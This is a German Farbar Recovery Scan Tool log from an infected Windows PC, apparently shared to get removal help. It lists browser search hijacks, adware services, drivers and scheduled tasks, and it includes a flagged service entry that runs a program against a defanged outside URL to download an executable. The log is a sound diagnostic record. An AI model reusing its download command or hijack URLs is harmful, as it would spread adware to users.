SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {9FFEE954-DB75-492A-B1CA-BA23C9B83007} URL = hxxp://www.searchpage.com/index.php?v=n11.12.1.13&os_mj=10&os_mn=0&os_bitness=64&mid=34ad48ad90a7763ca4a5b1eb450bf5bc&uid=E4380ECD4205EE69FB7D21E98448B14C&aid=3100&aid2=none&ts=1475952689&ts2=&psd=true&f=oJKf752nbc76&keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {FAD3AE2D-3E11-4E7C-82B8-904BB0EBAD7B} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,
SearchScopes: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyubyD6qB0pwjh5om8PEGcRgNuls3Wo_sM3zneLapNRLV7L2NYi9ZssuMLCaV-V2ew5ubcJBsiBNfxbYyl1r6DuqvBI4SfIYaaQWq8QvX4cC9apWMdG7qCKJo9OarQZiRNfFLxEWZRikJJxRmvgzFJNPsfTqLAIe&q={searchTerms}
BHO: FunFeedr -> {FFCDE64D-6974-45D8-8B68-1614D9D89C2B} -> C:\Program Files (x86)\FunFeedr\Content.x64.dll [2016-07-17] (FunFeedr)
BHO-x32: FunFeedr -> {FFCDE64D-6974-45D8-8B68-1614D9D89C2B} -> C:\Program Files (x86)\FunFeedr\Content.dll [2016-07-17] (FunFeedr)

FireFox:
========
FF DefaultProfile: 1nisvqqo.default
FF ProfilePath: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\1nisvqqo.default\Profiles\1nisvqqo.default [nicht gefunden]
FF ProfilePath: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default [2016-10-19]
FF user.js: detected! => C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\user.js [2016-10-09]
FF NewTab: Mozilla\Firefox\Profiles\1nisvqqo.default ->
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\1nisvqqo.default -> youndoo
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\1nisvqqo.default -> youndoo
FF Keyword.URL: Mozilla\Firefox\Profiles\1nisvqqo.default -> hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,
FF Homepage: Mozilla\Firefox\Profiles\1nisvqqo.default ->
FF Extension: (goMovix - Movies And More) - C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\Extensions\caa1-aDOiCAxFFMOVIX@jetpack.xpi [2016-10-03]
FF Extension: (Adblock Plus) - C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-10-03]
FF SearchPlugin: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\cvlj4y2n.xml [2016-10-09]
FF SearchPlugin: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\smod.xml [2016-10-09]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [351944 2015-11-04] (Advanced Micro Devices, Inc.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [350584 2016-09-26] (Avira Operations GmbH & Co. KG)
R2 backlh; C:\ProgramData\Logic Handler\set.exe [3786752 2016-10-07] () [Datei ist nicht signiert]
R2 bokuhepe; C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\kns9F11.tmp [637440 2016-10-19] () [Datei ist nicht signiert]
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 hfpGMNNy; C:\Program Files (x86)\WebShield\WebShield.exe [360448 2016-10-19] () [Datei ist nicht signiert]
R2 InterHop; C:\Program Files (x86)\InterHop\InterHop.exe [159232 2016-10-09] () [Datei ist nicht signiert]
R2 Nettrans; C:\ProgramData\NetworkPacketManitor\Nettrans.exe [57856 2016-09-28] () [Datei ist nicht signiert]
R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2016-10-08] ()
R2 Noije; C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe [170496 2016-08-11] () [Datei ist nicht signiert]
R2 ProntSpooler; C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe [134656 2016-05-19] () [Datei ist nicht signiert] <==== ACHTUNG
R2 SMUpd; C:\Program Files\Common Files\Noobzo\GNUpdate\smu.exe [3109888 2016-10-09] (Search Module Ltd.) [Datei ist nicht signiert]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S2 wdsvc; C:\Program Files\WebDiscoverBrowser\wdsvc2.exe [305376 2016-05-27] (Startup Service)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 winsaber; C:\Program Files (x86)\WinSaber\WinSaber.exe [693976 2016-10-14] ()
R2 zigipyro; C:\Users\maikp\AppData\Local\03AA02FC-1476882363-05C3-7606-B70700080009\qnsx1F3F.tmp [158720 2015-12-26] () [Datei ist nicht signiert]
S2 Bokvunnu; "C:\Users\maikp\AppData\Roaming\GowvePitpagf\Lurzem.exe" -cms [X]
S3 CHNGTSvc; c:\exervice.exe hxxp://cloudfront.f9dfc741d813c355ca38c2f3caf8380d42d27a38.xyz/download/xpack1018_DE.1476784947.exe [X] <==== ACHTUNG
S2 Quoteex; C:\ProgramData\\Quoteex\\Quoteex.exe shuz -f "C:\ProgramData\\Quoteex\\Quoteex.dat" -l -a
S2 Uwiseferesy; C:\Program Files (x86)\Ferqesp\cletaspwseMnt.dll [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R0 amdide64; C:\WINDOWS\System32\drivers\amdide64.sys [11944 2013-03-08] (Advanced Micro Devices Inc.)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [21160 2012-09-23] (Advanced Micro Devices, Inc.)
R2 AODDriver4.3; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2016-10-09] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 USBNUMP; C:\WINDOWS\System32\drivers\USBNUMP.sys [13872 2009-08-14] (Windows (R) Codename Longhorn DDK provider)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S1 NetUtils2016; \??\C:\WINDOWS\system32\drivers\NetUtils2016.sys [X] <==== ACHTUNG

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-10-19 13:22 - 2016-10-19 13:22 - 00016423 _____ C:\Users\maikp\Downloads\FRST.txt
2016-10-19 13:13 - 2016-10-19 13:13 - 00000000 ___HD C:\OneDriveTemp
2016-10-19 13:06 - 2016-10-19 13:06 - 00000000 ____D C:\Users\maikp\AppData\Local\03AA02FC-1476882363-05C3-7606-B70700080009
2016-10-19 12:05 - 2016-10-19 12:05 - 00000000 ____D C:\ProgramData\SearchModule
2016-10-19 11:12 - 2016-10-19 11:12 - 00001086 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2016-10-19 11:12 - 2016-10-19 11:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-10-19 11:12 - 2016-10-19 11:12 - 00000000 ____D C:\Program Files\VS Revo Group
2016-10-18 14:08 - 2016-10-18 14:08 - 00000000 ____D C:\Users\maikp\Downloads\FRST-OlderVersion
2016-10-18 12:59 - 2016-10-18 12:59 - 46039467 _____ C:\xpack1018_DE.1476784947.exe
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00FEDC30
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00FCF600
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000015775DEA1A8
2016-10-18 12:41 - 2016-10-18 12:41 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000015775DD1D98
2016-10-18 11:55 - 2016-10-18 11:55 - 46039469 _____ C:\xpack1017_DE.1476710064.exe
2016-10-17 20:00 - 2016-10-17 20:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0081AF20
2016-10-17 19:59 - 2016-10-17 19:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow007FB810
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow011C4C80
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow011B1E08
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000002027086C3C8
2016-10-17 19:46 - 2016-10-17 19:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000020270844988
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow01585888
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow01562150
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001FFCB67DB58
2016-10-17 19:00 - 2016-10-17 19:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001FFCB655EF8
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00844778
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0082FFA0
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000029C378F6228
2016-10-17 17:15 - 2016-10-17 17:15 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000029C378D7D48
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0140FFD8
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow013FE4D0
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000002763D3227C8
2016-10-17 16:40 - 2016-10-17 16:40 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000002763D2F3018
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow013B0D18
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow013B05A8
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00000166888D70D8
2016-10-17 16:29 - 2016-10-17 16:29 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00000166888C34D8
2016-10-17 16:03 - 2016-10-17 16:03 - 01866930 _____ C:\WINDOWS\6819e3abef567df1f1330af4ff9ec057.exe
2016-10-17 15:49 - 2016-10-19 13:10 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-10-17 15:49 - 2016-10-18 12:43 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-10-17 15:49 - 2016-10-17 15:49 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-10-17 15:48 - 2016-10-18 12:42 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-10-17 15:46 - 2016-10-18 13:21 - 00000000 ____D C:\Users\maikp\Desktop\mbar
2016-10-17 15:46 - 2016-10-17 15:45 - 16563352 _____ (Malwarebytes Corp.) C:\Users\maikp\Desktop\mbar-1.09.3.1001.exe
2016-10-17 15:41 - 2016-10-17 15:45 - 16563352 _____ (Malwarebytes Corp.) C:\Users\maikp\Downloads\mbar-1.09.3.1001.exe
2016-10-17 15:21 - 2016-10-17 15:21 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00F58728
2016-10-17 15:21 - 2016-10-17 15:21 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000014D2CFA8778
2016-10-17 14:01 - 2016-10-17 14:01 - 00003540 _____ C:\WINDOWS\System32\Tasks\ChelfNotify Task
2016-10-17 14:01 - 2016-10-17 14:01 - 00000000 ____D C:\ProgramData\ChelfNotify
2016-10-17 14:00 - 2016-10-17 14:01 - 00000000 ____D C:\Program Files (x86)\5sr6tz01
2016-10-17 13:43 - 2016-10-17 13:43 - 00003552 _____ C:\WINDOWS\System32\Tasks\GEN_Interval
2016-10-17 13:43 - 2016-10-17 13:43 - 00003208 _____ C:\WINDOWS\System32\Tasks\GEN
2016-10-17 13:43 - 2016-10-17 13:43 - 00000000 ____D C:\Program Files (x86)\FunFeedr
2016-10-17 13:26 - 2016-10-19 13:22 - 00000000 ____D C:\FRST
2016-10-17 13:25 - 2016-10-18 14:08 - 02407424 _____ (Farbar) C:\Users\maikp\Downloads\FRST64.exe
2016-10-17 13:13 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0125E1E8
2016-10-17 13:13 - 2016-10-17 13:13 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000025484F3DA18
2016-10-15 14:59 - 2016-10-15 14:59 - 00000000 ___HD C:\$SysReset
2016-10-15 14:53 - 2016-10-15 14:53 - 00001292 _____ C:\Users\Public\Desktop\Avira Connect.lnk
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Package Cache
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\ProgramData\Avira
2016-10-15 14:53 - 2016-10-15 14:53 - 00000000 ____D C:\Program Files (x86)\Avira
2016-10-15 14:52 - 2016-10-15 14:52 - 04480896 _____ (Avira Operations GmbH & Co. KG) C:\Users\maikp\Downloads\avira_de_av_580225382c90f__ws.exe
2016-10-14 20:33 - 2016-10-14 20:33 - 00000000 ____D C:\$WINDOWS.~BT
2016-10-14 19:47 - 2016-10-14 19:47 - 00000000 ____D C:\Users\maikp\AppData\LocalLow00E46BC8
2016-10-14 19:47 - 2016-10-14 19:47 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000016C33528488
2016-10-14 17:54 - 2016-10-17 14:01 - 00000000 ____D C:\Program Files (x86)\InterHop
2016-10-14 17:53 - 2016-10-14 17:54 - 00000000 ____D C:\Program Files (x86)\rpi9tiy4
2016-10-12 15:46 - 2016-10-12 15:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0098AB70
2016-10-12 15:46 - 2016-10-12 15:46 - 00000000 ____D C:\Users\maikp\AppData\LocalLow000001F63CD29028
2016-10-09 13:06 - 2016-10-09 13:06 - 00436224 _____ (GmbH) C:\WINDOWS\system32\bi3.exe
2016-10-09 08:02 - 2016-10-09 08:02 - 00000000 ____D C:\WINDOWS\system32\owew
2016-10-09 08:00 - 2016-10-09 08:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow033F8D50
2016-10-09 08:00 - 2016-10-09 08:00 - 00000000 ____D C:\Users\maikp\AppData\LocalLow0000010ED7324178
2016-10-09 07:59 - 2016-10-09 07:59 - 00008948 _____ C:\WINDOWS\System32\Tasks\Anezotionprodily Verfier
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Geunfy
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow\Company
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\Users\maikp\AppData\Local\Tempfolder
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\uninst
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\ProgramData\0781609d-5e85-1
2016-10-09 07:59 - 2016-10-09 07:59 - 00000000 ____D C:\ProgramData\0781609d-1fb5-0
2016-10-09 07:58 - 2016-10-19 12:30 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Herzaentreernos
2016-10-09 07:58 - 2016-10-09 07:58 - 00000000 ____D C:\Users\maikp\AppData\Local\Cleqiryvovaght
2016-10-09 07:53 - 2016-10-19 11:23 - 00000915 _____ C:\WINDOWS\SysWOW64\data
2016-10-09 07:48 - 2016-10-19 13:13 - 00000000 ____D C:\Users\maikp\AppData\Local\DailyBee
2016-10-09 07:48 - 2016-10-12 15:46 - 00440832 _____ C:\ProgramData\smp2.exe
2016-10-09 07:48 - 2016-10-09 07:48 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-10-09 07:48 - 2016-10-09 07:48 - 00004422 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c
2016-10-09 07:48 - 2016-10-09 07:48 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DailyBee
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Users\maikp\AppData\Roaming\DailyBee
2016-10-09 07:48 - 2016-10-09 07:48 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-10-09 07:43 - 2016-10-09 07:43 - 00000000 ____D C:\ProgramData\Microleaves
2016-10-09 07:43 - 2016-10-09 07:43 - 00000000 _____ C:\WINDOWS\system32\㌠瀴Ť__00007FF6FAFCA32A__C0000005.dmp
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Roaming\WikiZ
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WikiZ
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Users\maikp\AppData\Local\Phatek
2016-10-08 21:01 - 2016-10-08 21:01 - 00000000 ____D C:\Program Files (x86)\Priuhgily
2016-10-08 21:00 - 2016-10-08 21:01 - 00000000 ____D C:\Users\Public\Thunder Network
2016-10-08 21:00 - 2016-10-08 21:00 - 00008996 _____ C:\WINDOWS\System32\Tasks\Jizergh Launcher
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____T C:\WINDOWS\system32\mfs379.tmp
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____D C:\Users\maikp\AppData\Local\tuto_monetize_120161008
2016-10-08 21:00 - 2016-10-08 21:00 - 00000000 ____D C:\ProgramData\Thunder Network
2016-10-08 20:59 - 2016-10-17 15:21 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
2016-10-08 20:59 - 2016-10-08 20:59 - 00470592 _____ C:\WINDOWS\SysWOW64\NetUtils2016.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\SysWOW64\sstmp
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\System32\Tasks\Y2Go
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\WINDOWS\system32\sstmp
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpaceSoundPro 1.0
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Users\maikp\AppData\Roaming\HDWallPaper
2016-10-08 20:59 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Y2GoUpdater
2016-10-08 20:58 - 2016-10-19 13:34 - 00000000 ____D C:\Users\maikp\AppData\Local\Apps\2.0
2016-10-08 20:58 - 2016-10-19 12:18 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Clumick
2016-10-08 20:58 - 2016-10-17 16:27 - 00000000 ____D C:\Program Files (x86)\mpck
2016-10-08 20:58 - 2016-10-14 18:04 - 00000000 ____D C:\Program Files (x86)\OtherSearch
2016-10-08 20:58 - 2016-10-08 20:59 - 00000000 ____D C:\Program Files (x86)\Y2Go
2016-10-08 20:58 - 2016-10-08 20:58 - 00000000 ____D C:\Users\maikp\AppData\Local\Ulighthazertion
2016-10-08 20:57 - 2016-10-08 20:57 - 00004164 _____ C:\WINDOWS\System32\Tasks\WebDiscover Browser Update Task
2016-10-08 20:57 - 2016-10-08 20:57 - 00003394 _____ C:\WINDOWS\System32\Tasks\WebDiscover Browser Launch Task
2016-10-08 20:57 - 2016-10-08 20:57 - 00000000 ____D C:\Users\maikp\AppData\Local\WebDiscoverBrowser
2016-10-08 20:57 - 2016-10-08 20:57 - 00000000 ____D C:\Program Files\WebDiscoverBrowser
2016-10-08 20:55 - 2016-10-19 13:05 - 00000000 ____D C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009
2016-10-08 20:55 - 2016-10-19 13:04 - 00000000 ____D C:\Program Files (x86)\WebShield
2016-10-08 20:55 - 2016-10-08 20:55 - 00003766 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Updater
2016-10-08 20:55 - 2016-10-08 20:55 - 00003708 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian
2016-10-08 20:55 - 2016-10-08 20:55 - 00003702 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange Guard
2016-10-08 20:55 - 2016-10-08 20:55 - 00003690 _____ C:\WINDOWS\System32\Tasks\Traffic Exchange
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 ____D C:\Program Files (x86)\Microleaves
2016-10-08 20:55 - 2016-10-08 20:55 - 00000000 _____ C:\TOSTACK
2016-10-08 20:53 - 2016-10-08 20:56 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Microleaves
2016-10-08 20:52 - 2016-10-18 12:36 - 00000000 ____D C:\ProgramData\Quoteex
2016-10-08 20:52 - 2016-10-17 13:14 - 00002378 _____ C:\WINDOWS\SysWOW64\findit.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 07176704 _____ C:\Users\maikp\AppData\Roaming\agent.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 01928315 _____ C:\Users\maikp\AppData\Roaming\KeyApphase.tst
2016-10-08 20:52 - 2016-10-08 20:52 - 01897576 _____ C:\Users\maikp\AppData\Roaming\Sao-Cof.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 00190394 _____ C:\Users\maikp\AppData\Roaming\Doublephase.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 00140288 _____ C:\Users\maikp\AppData\Roaming\Installer.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00126464 _____ C:\Users\maikp\AppData\Roaming\noah.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00070704 _____ C:\Users\maikp\AppData\Roaming\Config.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00018432 _____ C:\Users\maikp\AppData\Roaming\Main.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 00015792 _____ C:\Users\maikp\AppData\Roaming\InstallationConfiguration.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00005568 _____ C:\Users\maikp\AppData\Roaming\md.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Quoteexs
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\NetworkPacketManitor
2016-10-08 20:52 - 2016-10-08 20:52 - 00000000 ____D C:\ProgramData\Logic Handler
2016-10-08 20:51 - 2016-10-19 12:05 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-10-07 16:44 - 2016-10-07 16:44 - 00000000 ___RD C:\Users\maikp\Downloads\BallardAppCraftery.CraftyFileViewer_epyrqhfctk40t!App
2016-10-06 19:57 - 2016-10-14 20:10 - 00000000 ____D C:\Users\maikp\Desktop\Nintendo 3DS
2016-10-06 19:54 - 2016-10-06 19:54 - 00115504 _____ C:\Users\maikp\OneDrive\Documents\encTitleKeys.bin
2016-10-06 19:53 - 2016-10-06 19:53 - 03699648 _____ C:\Users\maikp\OneDrive\Documents\freeShop-2.1.1.cia
2016-10-06 19:53 - 2016-10-06 19:53 - 03056576 _____ C:\Users\maikp\OneDrive\Documents\freeShop-1.2.2.cia
2016-10-06 19:52 - 2016-10-06 19:52 - 03220416 _____ C:\Users\maikp\Downloads\freeShop-2.1.3.cia
2016-10-05 16:36 - 2016-10-05 16:40 - 00000951 _____ C:\WINDOWS\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}.job
2016-10-05 16:36 - 2016-10-05 16:36 - 00004148 _____ C:\WINDOWS\System32\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}
2016-10-05 16:36 - 2016-10-05 16:36 - 00001014 _____ C:\Users\Public\Desktop\EPSON Scan.lnk
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPSON Software
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPSON
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files\Common Files\EPSON
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files (x86)\EPSON Software
2016-10-05 16:36 - 2016-10-05 16:36 - 00000000 ____D C:\Program Files (x86)\epson
2016-10-05 16:36 - 2014-06-03 00:00 - 00472064 _____ (Seiko Epson Corporation) C:\WINDOWS\system32\esxw2ud.dll
2016-10-05 16:36 - 2012-05-17 00:00 - 00144560 _____ (Seiko Epson Corporation) C:\WINDOWS\system32\escsvc64.exe
2016-10-05 16:34 - 2014-03-04 21:06 - 00180224 _____ (SEIKO EPSON CORPORATION) C:\WINDOWS\system32\E_YLMBPME.DLL
2016-10-05 16:34 - 2011-03-14 20:03 - 00083968 _____ (SEIKO EPSON CORPORATION) C:\WINDOWS\system32\E_YD4BPME.DLL
2016-10-05 16:33 - 2016-10-05 16:36 - 00000000 ____D C:\ProgramData\Epson
2016-10-05 16:30 - 2016-10-05 16:30 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-10-03 12:02 - 2016-10-14 17:57 - 00000000 ____D C:\Users\maikp\AppData\Local\MEGAsync
2016-10-03 12:02 - 2016-10-03 12:02 - 00000000 ____D C:\Users\maikp\AppData\Local\Mega Limited
2016-10-03 11:56 - 2016-10-03 12:01 - 12903336 _____ (MEGA Limited) C:\Users\maikp\Downloads\MEGAsyncSetup(1).exe
2016-10-03 11:52 - 2016-10-03 12:02 - 12903336 _____ (MEGA Limited) C:\Users\maikp\Downloads\MEGAsyncSetup.exe
2016-10-03 11:40 - 2016-10-19 13:18 - 00001431 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-10-03 11:40 - 2016-10-19 13:18 - 00001419 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-10-03 11:40 - 2016-10-03 11:48 - 00000000 ____D C:\Users\maikp\AppData\Local\Mozilla
2016-10-03 11:40 - 2016-10-03 11:41 - 00000000 ____D C:\Users\maikp\AppData\Roaming\Mozilla
2016-10-03 11:40 - 2016-10-03 11:40 - 00243744 _____ C:\Users\maikp\Downloads\Firefox Setup Stub 49.0.1.exe
2016-10-03 11:40 - 2016-10-03 11:40 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
